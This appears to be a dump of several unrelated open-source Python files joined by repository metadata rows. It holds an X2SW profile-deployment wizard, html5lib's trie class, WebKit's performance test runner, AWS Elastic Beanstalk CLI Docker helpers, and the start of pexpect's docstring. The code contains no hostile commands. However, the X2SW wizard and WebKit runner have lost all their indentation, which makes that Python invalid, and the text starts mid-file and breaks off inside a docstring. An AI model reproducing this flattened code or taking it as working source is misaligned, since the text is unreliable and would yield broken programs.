paths_str = "\nFrom repository: " + x2ProfilerApp.x2swProfilesPath + ".git\nDeployment path: " + x2ProfilerApp.x2swProfilesTgtPath
self.sel_box.SetLabel('Profile: ' + self.selection[10:] + paths_str)
else:
paths_str = "\nRepository path: none\nDeployment path: none"
self.sel_box.SetLabel('Profile: ' + 'not selected' + paths_str)
self.Show()
self.GetParent().Update()
if not x2ProfilerApp.page5.deploy_profile.IsChecked():
self.status.SetLabel("No changes performed, no profile selected!")
else:
try:
self.DoDeploy(self.selection)
self.status.SetLabel("The operation has completed successfully.")
except Exception as e:
self.status.SetLabel("\
The operation has failed! If using Windows in-place profile storage try to run\n\
the X2SW app in Windows XP(SP 2) compatibility mode or run it as Administrator.\n\
You can also cd to the X2SW profiles folder and use GIT to check out the desired\n\
profile manually or attempt to diagnose and fix the issue.")
wx.MessageBox("Error:\n\n" + str(e), '', style = wx.OK|wx.ICON_EXCLAMATION)
x2ProfilerApp.changes = True
self.Show()
self.GetParent().Update()
wx.CallAfter(self.afterRun)
#----------------------------------------------------------------------
def DoDeploy(self, ref):
global x2ProfilerApp
self.repo = x2ProfilerApp.repo
self.refs = self.repo.get_refs()
o = self.repo[ref]
while o.type_name == 'tag':
type_name, sha = o._get_object()
o = self.repo.get_object(sha)
if not o.type_name == 'commit':
raise ValueError('Unable to find the tagged commit!')
# We can only do a clean checkout, so clean up first
self.RmAllProfiles(x2ProfilerApp.x2swProfilesPath)
# Dulwich can't handle detached head, so use a temp branch as a workaround
self.repo.refs.set_symbolic_ref('HEAD', 'refs/heads/temp')
self.repo['HEAD'] = o.id
build_index_from_tree(self.repo.path, self.repo.index_path(),
self.repo.object_store, o.tree)
# Make the deployment folder (if not there) and checkout files into it
if not os.path.isdir(x2ProfilerApp.x2swProfilesTgtPath):
os.makedirs(x2ProfilerApp.x2swProfilesTgtPath)
else:
# Cleanup the deployment destination
self.RmAllProfiles(x2ProfilerApp.x2swProfilesTgtPath)
build_index_from_tree(x2ProfilerApp.x2swProfilesTgtPath, self.repo.index_path(),
self.repo.object_store, o.tree)
#----------------------------------------------------------------------
def RmAllProfiles(self, path):
if not path.endswith('.x2sw'):
raise ValueError('The path to RmAllProfiles() does not appear to be correct!')
for root, dirs, files in os.walk(path):
if root == path:
if '.git' in dirs:
dirs.remove('.git')
if '.git' in files:
files.remove('.git')
if '.use_local' in files:
files.remove('.use_local')
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
shutil.rmtree(os.path.join(root, name))
dirs.remove(name)
#----------------------------------------------------------------------
def SetNext(self, next):
self.next = next
#----------------------------------------------------------------------
def SetPrev(self, prev):
self.prev = prev
#----------------------------------------------------------------------
def GetNext(self):
return self.next
#----------------------------------------------------------------------
def GetPrev(self):
return self.prev
########################################################################
class X2ProfilerApp():
"""Main app class"""
#----------------------------------------------------------------------
def imagefile(self, filename):
if os.path.exists(os.path.join(os.path.dirname(__file__), "images", filename)):
return os.path.join(os.path.dirname(__file__), "images", filename)
else:
return os.path.join(os.path.split(os.path.split(__file__)[0])[0], "images", filename)
#----------------------------------------------------------------------
def DetermineProfilesPaths(self):
self.x2swProfilesTgtPath = os.path.join(os.path.expanduser('~'), '.x2sw')
if (os.path.exists(os.path.join(self.x2swProfilesTgtPath, '.use_local'))):
self.x2swProfilesTgtPath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), '.x2sw')
self.x2swProfilesPath = os.path.abspath(os.path.dirname(sys.argv[0]))
self.x2swProfilesPath = os.path.join(self.x2swProfilesPath, '.x2sw')
#----------------------------------------------------------------------
def ReadOurVersion(self):
versionfile = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), VERSION_FILE)
if os.path.exists(versionfile):
with open(versionfile) as f:
self.ver = f.read().splitlines()
else:
self.ver = [ None ]
# Match string (major.minor.); use: version_str_to_check.startswith(ver_match_str)
self.ver_match_str = ""
if self.ver[0]:
ver = self.ver[0]
ver = ver[:ver.find('.', ver.find('.') + 1) + 1]
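# keeps everything up to and including the second dot, e.g. "1.0.2.1" -> "1.0."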
self.ver_match_str = ver
else:
self.ver = [ "" ]
#----------------------------------------------------------------------
def IsProfileCompatible(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
for match_str in match_strs:
if self.ver[0] and self.ver[0].startswith(match_str):
we_are_compatible = True
break
return we_are_compatible
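# Note: given the startswith() checks above, COMPAT_FILE holds one version
# prefix per line; e.g. a (hypothetical) line "1.0." would mark every X2SW
# 1.0.x build as compatible with the currently deployed profile.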
#----------------------------------------------------------------------
def UpdateCompatFile(self):
compat_file = os.path.join(self.x2swProfilesPath, COMPAT_FILE)
we_are_compatible = False
match_strs = []
if os.path.exists(compat_file):
with open(compat_file) as f:
match_strs = f.read().splitlines()
match_strs.append(self.ver_match_str)
if os.path.exists(self.x2swProfilesPath):
with open(compat_file, "w") as myfile:
for line in match_strs:
myfile.write(line + "\n")
return
#----------------------------------------------------------------------
def Run(self, onlyIfVersionCheckFails = False):
global x2ProfilerApp
x2ProfilerApp = self
self.DetermineProfilesPaths()
self.repo = None
self.changes = False
### for debugging ### self.repo_url = 'D:\\tmp\\.x2sw'
self.repo_url = 'https://github.com/dob71/x2sw_profiles.git'
self.selection = None
self.tmp_repo_path = None
# Read our version (x2ProfilerApp.ver array contains strings from version.txt)
self.ReadOurVersion()
# If running for version check only, we are done if we have compatible profiles
if onlyIfVersionCheckFails:
if self.IsProfileCompatible():
return
else:
msg = "The current profile is not compatible with X2SW v" + self.ver[0] + ". "\
"Would you like to run X2Profiler and download compatible set of profiles? "\
"\n\n"\
"Click [Cancel] to mark the currnet profile compatible and no loger display this message "\
"(dangerous, the app might no longer start). Click [No] to skip the update just for now. "\
"You'll be asked to update again next time app starts."\
"\n\n"\
"Profile path: " + self.x2swProfilesPath
res = wx.MessageBox(msg, style = wx.YES_NO|wx.CANCEL|wx.YES_DEFAULT|wx.ICON_QUESTION)
if res == wx.CANCEL:
self.UpdateCompatFile()
return
elif res == wx.NO:
return
image = wx.Image(self.imagefile("wiz.png"), wx.BITMAP_TYPE_PNG).ConvertToBitmap()
self.wizard = wiz.Wizard(None, -1, "X2 Profile Manager", image)
self.page1 = UpdateRepoPage(self.wizard, "Update Profiles")
self.page2 = DownloadingPage(self.wizard, "Downloading")
self.page3 = SelectProfilesPage(self.wizard, "Select Profile")
self.page4 = ChooseModePage(self.wizard, "Storage Mode")
self.page5 = DeployPage(self.wizard, "Deploy Profile")
self.page6 = ReportResultPage(self.wizard, "Deploying")
# Set the initial order of the pages
self.page1.SetNext(self.page2)
self.page2.SetPrev(self.page1)
self.page2.SetNext(self.page3)
self.page3.SetPrev(self.page1) # Always skip downloading page on the way back
self.page3.SetNext(self.page4)
self.page4.SetPrev(self.page3)
self.page4.SetNext(self.page5)
self.page5.SetPrev(self.page4)
self.page5.SetNext(self.page6)
self.page6.SetPrev(self.page5)
iconpath = os.path.join(os.path.abspath(os.path.dirname(sys.argv[0])), 'x2.ico')
if os.path.exists(iconpath):
self.wizard.SetIcon(wx.Icon(iconpath,wx.BITMAP_TYPE_ICO))
self.wizard.Bind(wiz.EVT_WIZARD_PAGE_CHANGING, self.OnPageChanging)
self.wizard.Bind(wx.wizard.EVT_WIZARD_PAGE_CHANGED, self.OnPageChanged)
self.wizard.FitToPage(self.page1)
self.wizard.GetPageAreaSizer().Add(self.page1)
self.wizard.RunWizard(self.page1)
self.wizard.Destroy()
if not x2ProfilerApp.tmp_repo_path == None:
try:
shutil.rmtree(x2ProfilerApp.tmp_repo_path)
x2ProfilerApp.tmp_repo_path = None
except:
pass
return self.changes
#----------------------------------------------------------------------
def OnPageChanged(self, event):
cp = self.wizard.GetCurrentPage()
if hasattr(cp, 'Run'):
wx.CallAfter(cp.Run)
#----------------------------------------------------------------------
def OnPageChanging(self, event):
pg = event.GetPage()
if hasattr(pg, 'OnPageChanging'):
pg.OnPageChanging(event)
########################################################################
if __name__ == "__main__":
app = wx.App(False)
X2ProfilerApp().Run()
| gpl-3.0 | 2,277,148,858,392,293,600 | 40.854803 | 146 | 0.51235 | false |
WholeGrainGoats/servo | tests/wpt/web-platform-tests/tools/html5lib/html5lib/trie/py.py | 817 | 1763 | from __future__ import absolute_import, division, unicode_literals
from six import text_type
from bisect import bisect_left
from ._base import Trie as ABCTrie
class Trie(ABCTrie):
def __init__(self, data):
if not all(isinstance(x, text_type) for x in data.keys()):
raise TypeError("All keys must be strings")
self._data = data
self._keys = sorted(data.keys())
self._cachestr = ""
self._cachepoints = (0, len(data))
def __contains__(self, key):
return key in self._data
def __len__(self):
return len(self._data)
def __iter__(self):
return iter(self._data)
def __getitem__(self, key):
return self._data[key]
def keys(self, prefix=None):
if prefix is None or prefix == "" or not self._keys:
return set(self._keys)
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
start = i = bisect_left(self._keys, prefix, lo, hi)
else:
start = i = bisect_left(self._keys, prefix)
keys = set()
if start == len(self._keys):
return keys
while self._keys[i].startswith(prefix):
keys.add(self._keys[i])
i += 1
self._cachestr = prefix
self._cachepoints = (start, i)
return keys
def has_keys_with_prefix(self, prefix):
if prefix in self._data:
return True
if prefix.startswith(self._cachestr):
lo, hi = self._cachepoints
i = bisect_left(self._keys, prefix, lo, hi)
else:
i = bisect_left(self._keys, prefix)
if i == len(self._keys):
return False
return self._keys[i].startswith(prefix)
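# Illustrative usage sketch, not part of the original html5lib module; the
# sample keys and prefixes below are assumptions for illustration.
if __name__ == "__main__":
    t = Trie({u"abc": 1, u"abd": 2, u"xyz": 3})
    print(sorted(t.keys(u"ab")))           # the two keys starting with "ab"
    print(t.has_keys_with_prefix(u"xy"))   # True
    print(t[u"xyz"])                       # 3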
| mpl-2.0 | 1,897,480,550,322,918,000 | 25.313433 | 66 | 0.551333 | false |
fentas/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/performance_tests/perftestsrunner.py | 115 | 17309 | # Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Run Inspector's perf tests in perf mode."""
import os
import json
import logging
import optparse
import time
import datetime
from webkitpy.common import find_files
from webkitpy.common.checkout.scm.detection import SCMDetector
from webkitpy.common.config.urls import view_source_url
from webkitpy.common.host import Host
from webkitpy.common.net.file_uploader import FileUploader
from webkitpy.performance_tests.perftest import PerfTestFactory
from webkitpy.performance_tests.perftest import DEFAULT_TEST_RUNNER_COUNT
_log = logging.getLogger(__name__)
class PerfTestsRunner(object):
_default_branch = 'webkit-trunk'
EXIT_CODE_BAD_BUILD = -1
EXIT_CODE_BAD_SOURCE_JSON = -2
EXIT_CODE_BAD_MERGE = -3
EXIT_CODE_FAILED_UPLOADING = -4
EXIT_CODE_BAD_PREPARATION = -5
_DEFAULT_JSON_FILENAME = 'PerformanceTestsResults.json'
def __init__(self, args=None, port=None):
self._options, self._args = PerfTestsRunner._parse_args(args)
if port:
self._port = port
self._host = self._port.host
else:
self._host = Host()
self._port = self._host.port_factory.get(self._options.platform, self._options)
self._host.initialize_scm()
self._webkit_base_dir_len = len(self._port.webkit_base())
self._base_path = self._port.perf_tests_dir()
self._timestamp = time.time()
self._utc_timestamp = datetime.datetime.utcnow()
@staticmethod
def _parse_args(args=None):
def _expand_path(option, opt_str, value, parser):
path = os.path.expandvars(os.path.expanduser(value))
setattr(parser.values, option.dest, path)
perf_option_list = [
optparse.make_option('--debug', action='store_const', const='Debug', dest="configuration",
help='Set the configuration to Debug'),
optparse.make_option('--release', action='store_const', const='Release', dest="configuration",
help='Set the configuration to Release'),
optparse.make_option("--platform",
help="Specify port/platform being tested (i.e. chromium-mac)"),
optparse.make_option("--builder-name",
help=("The name of the builder shown on the waterfall running this script e.g. google-mac-2.")),
optparse.make_option("--build-number",
help=("The build number of the builder running this script.")),
optparse.make_option("--build", dest="build", action="store_true", default=True,
help="Check to ensure the DumpRenderTree build is up-to-date (default)."),
optparse.make_option("--no-build", dest="build", action="store_false",
help="Don't check to see if the DumpRenderTree build is up-to-date."),
optparse.make_option("--build-directory",
help="Path to the directory under which build files are kept (should not include configuration)"),
optparse.make_option("--time-out-ms", default=600 * 1000,
help="Set the timeout for each test"),
optparse.make_option("--no-results", action="store_false", dest="generate_results", default=True,
help="Do no generate results JSON and results page."),
optparse.make_option("--output-json-path", action='callback', callback=_expand_path, type="str",
help="Path to generate a JSON file at; may contain previous results if it already exists."),
optparse.make_option("--reset-results", action="store_true",
help="Clears the content in the generated JSON file before adding the results."),
optparse.make_option("--slave-config-json-path", action='callback', callback=_expand_path, type="str",
help="Only used on bots. Path to a slave configuration file."),
optparse.make_option("--description",
help="Add a description to the output JSON file if one is generated"),
optparse.make_option("--no-show-results", action="store_false", default=True, dest="show_results",
help="Don't launch a browser with results after the tests are done"),
optparse.make_option("--test-results-server",
help="Upload the generated JSON file to the specified server when --output-json-path is present."),
optparse.make_option("--webkit-test-runner", "-2", action="store_true",
help="Use WebKitTestRunner rather than DumpRenderTree."),
optparse.make_option("--replay", dest="replay", action="store_true", default=False,
help="Run replay tests."),
optparse.make_option("--force", dest="use_skipped_list", action="store_false", default=True,
help="Run all tests, including the ones in the Skipped list."),
optparse.make_option("--profile", action="store_true",
help="Output per-test profile information."),
optparse.make_option("--profiler", action="store",
help="Output per-test profile information, using the specified profiler."),
optparse.make_option("--additional-drt-flag", action="append",
default=[], help="Additional command line flag to pass to DumpRenderTree "
"Specify multiple times to add multiple flags."),
optparse.make_option("--driver-name", type="string",
help="Alternative DumpRenderTree binary to use"),
optparse.make_option("--repeat", default=1, type="int",
help="Specify number of times to run test set (default: 1)."),
optparse.make_option("--test-runner-count", default=DEFAULT_TEST_RUNNER_COUNT, type="int",
help="Specify number of times to invoke test runner for each performance test."),
]
return optparse.OptionParser(option_list=(perf_option_list)).parse_args(args)
def _collect_tests(self):
test_extensions = ['.html', '.svg']
if self._options.replay:
test_extensions.append('.replay')
def _is_test_file(filesystem, dirname, filename):
return filesystem.splitext(filename)[1] in test_extensions
filesystem = self._host.filesystem
paths = []
for arg in self._args:
if filesystem.exists(filesystem.join(self._base_path, arg)):
paths.append(arg)
else:
relpath = filesystem.relpath(arg, self._base_path)
if filesystem.exists(filesystem.join(self._base_path, relpath)):
paths.append(filesystem.normpath(relpath))
else:
_log.warn('Path was not found: ' + arg)
skipped_directories = set(['.svn', 'resources'])
test_files = find_files.find(filesystem, self._base_path, paths, skipped_directories, _is_test_file)
tests = []
for path in test_files:
relative_path = filesystem.relpath(path, self._base_path).replace('\\', '/')
if self._options.use_skipped_list and self._port.skips_perf_test(relative_path) and filesystem.normpath(relative_path) not in paths:
continue
test = PerfTestFactory.create_perf_test(self._port, relative_path, path, test_runner_count=self._options.test_runner_count)
tests.append(test)
return tests
def run(self):
if not self._port.check_build(needs_http=False):
_log.error("Build not up to date for %s" % self._port._path_to_driver())
return self.EXIT_CODE_BAD_BUILD
run_count = 0
repeat = self._options.repeat
while (run_count < repeat):
run_count += 1
tests = self._collect_tests()
runs = ' (Run %d of %d)' % (run_count, repeat) if repeat > 1 else ''
_log.info("Running %d tests%s" % (len(tests), runs))
for test in tests:
if not test.prepare(self._options.time_out_ms):
return self.EXIT_CODE_BAD_PREPARATION
unexpected = self._run_tests_set(sorted(list(tests), key=lambda test: test.test_name()))
if self._options.generate_results and not self._options.profile:
exit_code = self._generate_results()
if exit_code:
return exit_code
if self._options.generate_results and not self._options.profile:
test_results_server = self._options.test_results_server
if test_results_server and not self._upload_json(test_results_server, self._output_json_path()):
return self.EXIT_CODE_FAILED_UPLOADING
if self._options.show_results:
self._port.show_results_html_file(self._results_page_path())
return unexpected
def _output_json_path(self):
output_json_path = self._options.output_json_path
if output_json_path:
return output_json_path
return self._host.filesystem.join(self._port.perf_results_directory(), self._DEFAULT_JSON_FILENAME)
def _results_page_path(self):
return self._host.filesystem.splitext(self._output_json_path())[0] + '.html'
def _generate_results(self):
options = self._options
output_json_path = self._output_json_path()
output = self._generate_results_dict(self._timestamp, options.description, options.platform, options.builder_name, options.build_number)
if options.slave_config_json_path:
output = self._merge_slave_config_json(options.slave_config_json_path, output)
if not output:
return self.EXIT_CODE_BAD_SOURCE_JSON
output = self._merge_outputs_if_needed(output_json_path, output)
if not output:
return self.EXIT_CODE_BAD_MERGE
filesystem = self._host.filesystem
json_output = json.dumps(output)
filesystem.write_text_file(output_json_path, json_output)
template_path = filesystem.join(self._port.perf_tests_dir(), 'resources/results-template.html')
template = filesystem.read_text_file(template_path)
absolute_path_to_trunk = filesystem.dirname(self._port.perf_tests_dir())
results_page = template.replace('%AbsolutePathToWebKitTrunk%', absolute_path_to_trunk)
results_page = results_page.replace('%PeformanceTestsResultsJSON%', json_output)
filesystem.write_text_file(self._results_page_path(), results_page)
def _generate_results_dict(self, timestamp, description, platform, builder_name, build_number):
revisions = {}
for (name, path) in self._port.repository_paths():
scm = SCMDetector(self._host.filesystem, self._host.executive).detect_scm_system(path) or self._host.scm()
revision = scm.svn_revision(path)
revisions[name] = {'revision': revision, 'timestamp': scm.timestamp_of_revision(path, revision)}
meta_info = {
'description': description,
'buildTime': self._datetime_in_ES5_compatible_iso_format(self._utc_timestamp),
'platform': platform,
'revisions': revisions,
'builderName': builder_name,
'buildNumber': int(build_number) if build_number else None}
contents = {'tests': {}}
for key, value in meta_info.items():
if value:
contents[key] = value
for test, metrics in self._results:
for metric_name, iteration_values in metrics.iteritems():
if not isinstance(iteration_values, list): # We can't reports results without individual measurements.
continue
tests = contents['tests']
path = test.test_name_without_file_extension().split('/')
for i in range(0, len(path)):
is_last_token = i + 1 == len(path)
url = view_source_url('PerformanceTests/' + (test.test_name() if is_last_token else '/'.join(path[0:i + 1])))
tests.setdefault(path[i], {'url': url})
current_test = tests[path[i]]
if is_last_token:
current_test.setdefault('metrics', {})
assert metric_name not in current_test['metrics']
current_test['metrics'][metric_name] = {'current': iteration_values}
else:
current_test.setdefault('tests', {})
tests = current_test['tests']
return contents
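# Illustrative note, not part of the original WebKit source: under the logic
# above, the returned dictionary has roughly the following shape (all field
# values below are made-up examples):
#
#   {
#     "buildTime": "2013-01-01T00:00:00.000000",
#     "platform": "mac",
#     "revisions": {"WebKit": {"revision": "140000", "timestamp": "..."}},
#     "tests": {
#       "Parser": {
#         "url": ".../PerformanceTests/Parser",
#         "tests": {
#           "html5-full-render.html": {
#             "url": ".../PerformanceTests/Parser/html5-full-render.html",
#             "metrics": {"Time": {"current": [[1098.0, 1099.0, 1095.0]]}}
#           }
#         }
#       }
#     }
#   }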
@staticmethod
def _datetime_in_ES5_compatible_iso_format(datetime):
return datetime.strftime('%Y-%m-%dT%H:%M:%S.%f')
def _merge_slave_config_json(self, slave_config_json_path, contents):
if not self._host.filesystem.isfile(slave_config_json_path):
_log.error("Missing slave configuration JSON file: %s" % slave_config_json_path)
return None
try:
slave_config_json = self._host.filesystem.open_text_file_for_reading(slave_config_json_path)
slave_config = json.load(slave_config_json)
for key in slave_config:
contents['builder' + key.capitalize()] = slave_config[key]
return contents
except Exception, error:
_log.error("Failed to merge slave configuration JSON file %s: %s" % (slave_config_json_path, error))
return None
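# Illustrative note, not part of the original WebKit source: based on the loop
# above, a hypothetical slave configuration file such as
#
#   {"id": 17, "gpu": "GeForce GT 120"}
#
# would be merged into the output JSON as "builder"-prefixed, capitalized keys,
# e.g. "builderId": 17 and "builderGpu": "GeForce GT 120".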
def _merge_outputs_if_needed(self, output_json_path, output):
if self._options.reset_results or not self._host.filesystem.isfile(output_json_path):
return [output]
try:
existing_outputs = json.loads(self._host.filesystem.read_text_file(output_json_path))
return existing_outputs + [output]
except Exception, error:
_log.error("Failed to merge output JSON file %s: %s" % (output_json_path, error))
return None
def _upload_json(self, test_results_server, json_path, host_path="/api/report", file_uploader=FileUploader):
url = "https://%s%s" % (test_results_server, host_path)
uploader = file_uploader(url, 120)
try:
response = uploader.upload_single_text_file(self._host.filesystem, 'application/json', json_path)
except Exception, error:
_log.error("Failed to upload JSON file to %s in 120s: %s" % (url, error))
return False
response_body = [line.strip('\n') for line in response]
if response_body != ['OK']:
try:
parsed_response = json.loads('\n'.join(response_body))
except:
_log.error("Uploaded JSON to %s but got a bad response:" % url)
for line in response_body:
_log.error(line)
return False
if parsed_response.get('status') != 'OK':
_log.error("Uploaded JSON to %s but got an error:" % url)
_log.error(json.dumps(parsed_response, indent=4))
return False
_log.info("JSON file uploaded to %s." % url)
return True
def _run_tests_set(self, tests):
result_count = len(tests)
failures = 0
self._results = []
for i, test in enumerate(tests):
_log.info('Running %s (%d of %d)' % (test.test_name(), i + 1, len(tests)))
start_time = time.time()
metrics = test.run(self._options.time_out_ms)
if metrics:
self._results.append((test, metrics))
else:
failures += 1
_log.error('FAILED')
_log.info('Finished: %f s' % (time.time() - start_time))
_log.info('')
return failures
| bsd-3-clause | -5,582,124,142,793,653,000 | 47.89548 | 144 | 0.617944 | false |
quickresolve/accel.ai | flask-aws/lib/python2.7/site-packages/ebcli/containers/commands.py | 5 | 8658 | # Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import json
import sys
from botocore.compat import six
from cement.utils.misc import minimal_logger
from ..core import fileoperations
from ..lib import utils
from ..objects.exceptions import ValidationError, CommandError
from ..resources.strings import strings
EXPOSE_CMD = 'EXPOSE'
FROM_CMD = 'FROM'
LATEST_TAG = ':latest'
NETWORK_SETTINGS_KEY = 'NetworkSettings'
PORTS_KEY = 'Ports'
HOST_PORT_KEY = 'HostPort'
STATE_KEY = 'State'
RUNNING_KEY = 'Running'
LOG = minimal_logger(__name__)
def pull_img(full_docker_path):
"""
Pulls a base image found in Dockerfile.
:param full_docker_path: str: path to the Dockerfile
:return: None
"""
img = _get_base_img(full_docker_path)
if not _is_tag_specified(img):
img += LATEST_TAG
_pull_img(img)
def build_img(docker_path, file_path=None):
"""
Builds a docker image using Dockerfile found in docker path.
:param docker_path: str: path of dir containing the Dockerfile
:param file_path: str: optional name of Dockerfile
:return: str: id of the new image
"""
opts = ['-f', file_path] if file_path else []
args = ['docker', 'build'] + opts + [docker_path]
output = _run_live(args)
return _grab_built_image_id(output)
def run_container(full_docker_path, image_id, host_port=None,
envvars_map=None, volume_map=None, name=None):
"""
Runs a Docker container. Container port comes from the Dockerfile,
which is mapped to the given host port.
:param full_docker_path: str: path to the Dockerfile
:param image_id: str: id of the image being used to run
:host_port: str: optional host port. Same as container port by default
:envvars_map: dict: optional key-val map of environment variables
:volume_map: dict: optional key-val map of host-container volume mounts
:name: str: optional name to be assigned to the container
:return: None
"""
container_port = _get_container_port(full_docker_path)
if host_port is None:
host_port = container_port
_run_container(image_id, container_port, host_port, envvars_map,
volume_map, name)
def rm_container(container_id, force=False):
"""
Remove a container.
:param container_id: str: the container's id or name
:param force: bool: force the removal of the container (SIGKILL)
:return None
"""
force_arg = ['-f'] if force else []
args = ['docker', 'rm'] + force_arg + [container_id]
_run_quiet(args)
def up(compose_path=None, allow_insecure_ssl=False):
"""
Build and run the entire app using services defined in docker-compose.yml.
:param compose_path: str: optional alternate path to docker-compose.yml
:param allow_insecure_ssl: bool: allow insecure connection to docker registry
:return None
"""
file_opt = ['-f', '{}'.format(compose_path)] if compose_path else []
insecure_ssl_opt = ['--allow-insecure-ssl'] if allow_insecure_ssl else []
args = file_opt + ['up'] + insecure_ssl_opt
LOG.debug(args)
_compose_run(args)
def _compose_run(args):
from ebcli.bundled._compose.cli.main import main as compose_run
compose_run(*args)
def get_container_lowlvl_info(container_id):
"""
Get a running container's low level info.
:param container_id: str: the running container's id or name
:return dict
"""
args = ['docker', 'inspect', container_id]
info = json.loads(_run_quiet(args))
return info[0]
def is_container_existent(container_id):
"""
Return whether container exists.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
get_container_lowlvl_info(container_id)
return True
except CommandError:
return False
def is_running(container_id):
"""
Return whether container is currently running.
:param container_id: str: the id or name of the container to check
:return bool
"""
try:
info = get_container_lowlvl_info(container_id)
return info[STATE_KEY][RUNNING_KEY]
except CommandError:
return False
def get_exposed_hostports(container_id):
"""
Get the host ports we exposed when we ran this container.
:param container_id: str: the id or name of the running container
:return list
"""
# Since we ran the container, we can guarantee that
# one host port and one or more container ports are exposed.
# Example of port_map:
#
# {'4848/tcp': None,
# '8080/tcp': [{'HostPort': '8080', 'HostIp': '0.0.0.0'}],
# '8181/tcp': None}
try:
port_map = _get_network_settings(container_id)[PORTS_KEY] or {}
return utils.flatten([[p[HOST_PORT_KEY] for p in ports]
for ports in six.itervalues(port_map) if ports])
except CommandError: # Not running
return []
def version():
args = ['docker', '--version']
version_str = _run_quiet(args)
# Format: Docker version 1.5.0, build a8a31ef
return version_str.split()[2].strip(',')
def compose_version():
args = ['docker-compose', '--version']
# Format: docker-compose 1.1.0
return _run_quiet(args).split()[-1]
def _get_network_settings(container_id):
info = get_container_lowlvl_info(container_id)
return info[NETWORK_SETTINGS_KEY]
def _pull_img(img):
args = ['docker', 'pull', img]
return _run_live(args)
def _grab_built_image_id(build_output):
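    # 'docker build' typically ends its output with a line such as
    # 'Successfully built <image id>' (illustrative), so the image id is taken
    # as the last whitespace-separated token of the output.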
last_line = build_output.split()[-1]
image_id = last_line.split()[-1]
return image_id
def _run_container(image_id, container_port, host_port, envvars_map,
volume_map, name):
port_mapping = '{}:{}'.format(host_port, container_port)
interactive_opt = ['-i']
pseudotty_opt = ['-t']
rm_container_on_exit_opt = ['--rm']
port_opt = ['-p', port_mapping]
envvar_opt = _get_env_opts(envvars_map)
volume_opt = _get_volume_opts(volume_map)
name_opt = ['--name', name] if name else []
opts = (interactive_opt + pseudotty_opt + rm_container_on_exit_opt +
port_opt + envvar_opt + volume_opt + name_opt)
args = ['docker', 'run'] + opts + [image_id]
return _run_live(args)
def _get_container_port(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(EXPOSE_CMD),
strings['local.run.noportexposed'])[1]
def _get_base_img(full_docker_path):
return _fst_match_in_dockerfile(full_docker_path,
lambda s: s.startswith(FROM_CMD),
strings['local.run.nobaseimg'])[1]
def _fst_match_in_dockerfile(full_docker_path, predicate, not_found_error_msg):
raw_lines = fileoperations.readlines_from_text_file(full_docker_path)
stripped_lines = (x.strip() for x in raw_lines)
try:
line = next(x for x in stripped_lines if predicate(x))
return line.split()
except StopIteration:
raise ValidationError(not_found_error_msg)
def _is_tag_specified(img_name):
return ':' in img_name
def _get_env_opts(envvars_map):
return _get_opts(envvars_map, '--env', '{}={}')
def _get_volume_opts(volume_map):
return _get_opts(volume_map, '-v', '{}:{}')
def _get_opts(_map, opt_name, val_format):
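    # For example (illustrative): _get_opts({'PORT': '80'}, '--env', '{}={}')
    # returns ['--env', 'PORT=80'].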
_map = _map or {}
kv_pairs = six.iteritems(_map)
return utils.flatten([[opt_name, val_format.format(k, v)] for k, v
in kv_pairs])
def _run_quiet(args):
try:
return utils.exec_cmd_quiet(args)
except CommandError as e:
_handle_command_error(e)
def _run_live(args):
try:
return utils.exec_cmd_live_output(args)
except CommandError as e:
_handle_command_error(e)
def _handle_command_error(e):
socket_perm_msg = "dial unix /var/run/docker.sock: permission denied."
if socket_perm_msg in e.output:
raise CommandError(strings['local.run.socketperms'], e.output, e.code)
else:
raise CommandError
| mit | 7,421,618,116,844,425,000 | 28.349153 | 81 | 0.642065 | false |
yasoob/PythonRSSReader | venv/lib/python2.7/dist-packages/pexpect/__init__.py | 1 | 83018 | '''Pexpect is a Python module for spawning child applications and controlling
them automatically. Pexpect can be used for automating interactive applications
such as ssh, ftp, passwd, telnet, etc. It can be used to automate setup
scripts for duplicating software package installations on different servers. It
can be used for automated software testing. Pexpect is in the spirit of Don
Libes' Expect, but Pexpect is pure Python. Other Expect-like modules for Python
require TCL and Expect or require C extensions to be compiled. Pexpect does not
use C, Expect, or TCL extensions. It should work on any platform that supports
the standard Python pty module. The Pexpect interface focuses on ease of use so
that simple tasks are easy.
